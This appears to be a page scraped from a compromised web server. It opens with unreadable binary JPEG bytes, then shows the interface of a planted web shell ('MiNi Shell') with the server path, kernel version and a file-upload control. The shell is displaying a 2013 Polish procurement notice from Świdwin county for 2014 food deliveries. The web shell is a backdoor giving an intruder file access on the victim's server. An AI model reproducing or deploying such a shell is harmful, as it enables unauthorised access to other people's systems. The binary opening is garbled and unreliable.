JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131126/484768-N-2013.html

<p class="kh_header"><b>Świdwin: Dostawa artykułów żywnościowych w roku 2014</b><br>
<b>Numer ogłoszenia: 484768 - 2013; data zamieszczenia: 26.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatswidwinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych w roku 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I świeże warzywa i owoce
Część II  wyroby piekarskie
Część III  mrożone artykuły spożywcze
Część IV  jaja kurze świeże
Część V  artykuły spożywcze sypkie, koncentraty, przyprawy i desery
Część VI  mięso świeże, wędliny i drób
Część VII  mleko i produkty mleczarskie
Szczegółowy zakres zamówienia został opisany w pkt. C SIWZ
Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do siedziby Zamawiającego znajdującej się w Sławoborzu przy ul. Lepińskiej 3. Każdy z produktów powinien być dostarczony w wymaganych opakowaniach.
Cykliczne dostawy  będą realizowane jak następuje: 

    - Część I świeże warzywa i owoce - w drugim dniu od złożenia zamówienia od
       poniedziałku do piątku w godzinach od  7.30 do   14.00.
    - Część II  wyroby piekarskie - codziennie w drugim dniu od złożenia zamówienia od
       poniedziałku do  piątku w godz. od 7.30   do  8.30.
    - Część III  mrożone artykuły spożywcze - w  drugim dniu  od złożenia zamówienia 
      od poniedziałku do piątku w godz. od 7.30 do 14.00.
    - Część IV jaja kurze świeże - w drugim dniu  od złożenia zamówienia od poniedziałku 
      do piątku w godz. od 7.30 do 14.00.
    - Część V artykuły spożywcze sypkie, koncentraty, przyprawy i desery - w drugim     dniu
      od złożenia zamówienia od poniedziałku do piątku w godz. od 7.30 do 14.00.
    - Część VI  mięso świeże, wędliny i drób - w drugim     dniu  od złożenia zamówienia 
      od poniedziałku do piątku w godz. od 7.30 do 10.00.
    - Część VII  mleko i produkty mleczarskie - codziennie  w drugim dniu od złożenia
      zamówienia od poniedziałku do piątku  w godz. od  7.30 do 10.00.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6, 15.81.10.00-6, 15.33.11.70-9, 03.14.25.00-3, 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstąpił od obowiązku wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy:
Wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, minimum 2 dostawy, odpowiadające swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia. Przez dostawę odpowiadającą rodzajem rozumie się cykliczną dostawę żywności przez okres min. 12 miesięcy. Nie określa się minimalnej wartości zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Placówek Specjalnych w Sławoborzu, ul. Lepińska 3, 78-314 Sławoborze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2013 godzina 09:30, miejsce: Gabinet Dyrektora Zespołu Placówek Specjalnych w Sławoborzu, ul. Lepińska 3, 78-314 Sławoborze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> świeże warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Banany	kg	160
Buraki		
Miesiąc I-III	kg	65
Miesiąc IV-VI	kg	60
Miesiąc VII-IX	kg	40
Miesiąc X-XII	kg	85
Cebula 		
Miesiąc I-III	kg	45
Miesiąc IV-VI	kg	40
Miesiąc VII-IX	kg	15
Miesiąc X-XII	kg	30
Fasola Jaś gruba		
Miesiąc I-III	kg	20
Miesiąc IV-VI	kg	20
Miesiąc VII-IX	kg	10
Miesiąc X-XII	kg	20
Groch połówki	kg	50
Jabłka		
Miesiąc I-III	kg	190
Miesiąc IV-VI	kg	200
Miesiąc VII-IX	kg	110
Miesiąc X-XII	kg	200
Kapusta kiszona		
Miesiąc I-III	kg	60
Miesiąc IV-VI	kg	70
Miesiąc VII-IX	kg	40
Miesiąc X-XII	kg	60
Kapusta czerwona	kg	30
Kapusta biała		
Miesiąc I-III	kg	60
Miesiąc IV-VI	kg	80
Miesiąc VII-IX	szt.	30
Miesiąc X-XII	szt.	80
Kalafior sezon 		
Miesiąc VIII-X	szt.	20
Koper świeży		
Miesiąc IV-VI	szt.	35
Miesiąc VII-IX	szt.	30
Miesiąc X-XII	szt.	50
Cytryna	kg	45
Kapusta pekińska		
Miesiąc I-III	kg	20
Miesiąc IV-VI	kg	20
Miesiąc VII-IX	kg	20
Miesiąc X-XII	kg	30
Marchew		
Miesiąc I-III	kg	40
Miesiąc IV-VI	kg	70
Miesiąc VII-IX	kg	20
Miesiąc X-XII	kg	70
Mandarynki		
Miesiąc I-II	kg	30
Miesiąc III-V	kg	10
Miesiąc X-XII	kg	30
Ogórek kiszony		
Miesiąc I-III	kg	40
Miesiąc IV-VI	kg	40
Miesiąc VII-IX	kg	20
Miesiąc X-XII	kg	40
Ogórek świeży sezon		
Miesiąc IV-VII	kg	30
Miesiąc VIII-X	kg	30
Pomidory kl. I sezon		
Miesiąc V-X	kg	30
Pory		
Miesiąc I-III	kg	10
Miesiąc IV-VI	kg	10
Miesiąc VII-IX	kg	10
Miesiąc X-XII	kg	10
Pomarańcze 		
Miesiąc XII	kg	15
Pieczarki		
Miesiąc I-VII	kg	60
Miesiąc VII-XII	kg	40
Papryka czerwona kl. I 		
Miesiąc I - VI	kg	25
Miesiąc  IX-X	kg	10
Miesiąc XI-XII	kg	10
Pietruszka korzeń		
Miesiąc I-III	kg	4
Miesiąc IV-VI	       kg	4
Miesiąc VII-IX	kg	4
Miesiąc X-XII	kg	4
Rzodkiew biała	kg	80
Rzodkiewka		
Miesiąc IV-VI	szt.	20
Miesiąc IX-XI	szt.	10
Seler korzeń		
Miesiąc I-III	kg	30
Miesiąc IV-VI	kg	5
Miesiąc VIII-IX	kg	10
Miesiąc X-XII	kg	15
Szczypior		
Miesiąc I-III	szt.	40
Miesiąc IV-VI	szt.	20
Miesiąc VII-IX	szt.	10
Miesiąc X-XII	      szt.	30
Sałata zielona  		
Miesiąc IV-VI	szt.	30
Miesiąc IX-X	szt.	15
Natka pietruszki		
Miesiąc IV-XI	szt.	80
Kiwi	szt.	200
Ziemniaki		
Miesiąc I-III	kg	1200
Miesiąc IV-VIII	kg	1000
Miesiąc IX-XII	kg	1500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb  zwykły (krojony 0,60 kg)	szt.	2100
Bułka pszenna (0,07kg)	szt.	1000
Chleb graham (krojony 0,40kg)	szt.	 180
Chleb razowy (krojony 0,40kg)	szt.	500
Drożdżówki ( 0,10kg)	szt.	100
Pączek ( 0,07kg)	szt.	100
Bułka tarta	kg	  25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> mrożone artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuł  opak. 4 x 2,5kg = 10kg	kg	10
Bukiet warzyw (marchew, kalafior, brokuł) opak. 4 x 2,5kg = 10kg	kg	70
Fasolka szparagowa opak. 4 x 2,5kg = 10kg	kg	85
Kalafior opak. 4 x 2,5kg = 10kg	kg	70
Marchew karbowana opak. 4x 2,5kg = 10kg	kg	50
Mieszanka. kompotowa 4-składnikowa opak. 4 x 2,5kg = 10kg	kg	600
Mieszanka warzywna  9-składnikowa opak. 4 x 2,5kg = 10kg	kg	30
Mieszanka chińska	kg	50
Groszek zielony opak. 4 x 2,5kg = 10kg	kg	40
Filet rybny z dorsza bez skóry, bez glazury	kg	140
Włoszczyzna paski opak. 4 x 2,5kg = 10kg	kg	480
Pierogi z kapustą i grzybami	kg	50
Kluski śląskie	kg	30
Pyzy z mięsem	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> jaja kurze świeże o gramaturze 70 -75g.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze 70-75g	
szt.	
3700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> artykuły spożywcze sypkie, koncentraty, przyprawy i desery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier	kg	370
Mąka pszenna 1kg	kg	220
Kasza jęczmienna 1kg	kg	90
Kasza gryczana 1kg	kg	90
Kasza manna 1kg	kg	30
Ryż 1kg	kg	180
Makarony z pszenicy durum/różne kształty/	kg	160
Płatki kukurydziane	kg	60
Płatki śniadaniowe /różne smaki/	kg	60
Płatki owsiane	kg	15
Dżem wysokosłodzony  /różne smaki/ 270g	szt.	30
Marmolada wieloowocowa 500g	szt.	100
Powidła śliwkowe 500g	szt.	40
Groszek konserwowy 400 g	szt.	70
Keczup 500g	szt.	90
Koncentrat pomidorowy  30% 200g	szt.	140
Koncentrat pomidorowy 30%
850g	szt.	30
Syrop owocowy 430ml	szt.	50
Kukurydza 400g	szt.	40
Majonez 700ml	szt.	50
Majonez 260g	szt.	40
Ogórki konserwowe 0,9l	szt.	20
Papryka konserwowa 0,9l	szt.	60
Sałatka warzywna 0,9l	szt.	50
Szczaw konserwowy 0,9l	szt.	50
Fasola konserwowa 400g	szt.	20
Herbata ekspresowa 28g	szt.	80
Kakao 100 % - 200 g	szt.	40
Kawa Inka 150 g	szt.	70
Pasztet drobiowy 160g	szt.	160
Sałatka z makreli 300g	szt.	130
Mąka ziemniaczana	kg	20
Sól jodowana	kg	140
Olej uniwersalny 1l	szt	130
Frytura do smażenia	kg	30
Margaryna  zwykła 250g	szt.	20
Musztarda 180g	szt.	70
Chrzan tarty 270g	szt.	70
Papryka mielona słodka, ostra 20g	szt.	100
Pieprz naturalny mielony 20g	szt.	100
Przyprawa do kurczaka 	kg	50
Przyprawa do ryb	kg	20
Przyprawa do mięsa wieprzowego	kg	30
Proszek do pieczenia 20 g	szt.	30
Ziele angielskie 20g	szt.	30
Kwasek cytrynowy 20g	szt.	80
Rosół drobiowy w kostce 120g	szt.	50
Cukier waniliowy 20g	szt	25
Cynamon 20g	szt.	10
 Galaretki owocowe 90g	szt.	10
Czosnek granulowany 20g	szt.	160
Liść laurowy 6g	szt.	30
Majeranek 150g	szt.	60
Natka pietruszki suszona 6g	szt.	120
Ciastka różne	kg	10
Cukierki owocowe	kg	10
Cukierki czekoladowe	kg	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> mięso świeże, wędliny i drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szynka wieprzowa b/k	kg	15
Karkówka wieprzowa b/k	kg	120
Schab wieprzowy b/k	kg	120
Łopatka wieprzowa b/k, b/s	kg	500
Wołowina extra	kg	60
Żeberka wieprzowe	kg	100
Biodrówka	kg	20
Wątroba wieprzowa	kg	20
II Wędliny świeże
Blok z indyka	kg	25
Baleron z indyka	kg	30
Kiełbasa piwna	kg	80
Kiełbasa śląska	kg	70
Kiełbasa szynkowa	kg	35
Kiełbasa krakowska parzona	kg	30
Kiełbasa żywiecka	kg	60
Mielonka drobiowa	kg	30
Parówki śląskie	kg	70
Pasztetowa	kg	30
Pieczeń rzymska	kg	50
Polędwica z warzywami	kg	60
Szynka wieprzowa prasowana	kg	20
Szynka wieprzowa	kg	40
Kaszanka	kg	60
Polędwica drobiowa	kg	30
Kiełbasa zwyczajna	kg	30
Pieczeń drobiowa	kg	10
Boczek parzony	kg	35
Kiełbasa biała	kg	10
Baton szynkowy drobiowy	kg	35
III Mięso drobiowe świeże
Kurczak	kg	110
Filet z kurczaka surowy	kg	180
Udka z kurczaka	kg	120
Wątróbka drobiowa	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> mleko i produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt owocowy 120g	szt.	2300
Jogurt naturalny 370.	szt.	30
Jogurt owocowy 300g	szt.	150
Masło śmietankowe 82% kostka 200g	kg	230
Mleko 2% świeże	l.	1300
Mleko UHT 2%	l.	600
Serki topione miks krążek 140g	szt.	120
Serek topiony  kiełbaski  100 g	szt.	70
Ser żółty gouda/edamski	kg	100
Śmietana 18% 400g	szt.	650
Twaróg półtłusty	kg	80
Serek waniliowy  w wiaderku	kg	90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com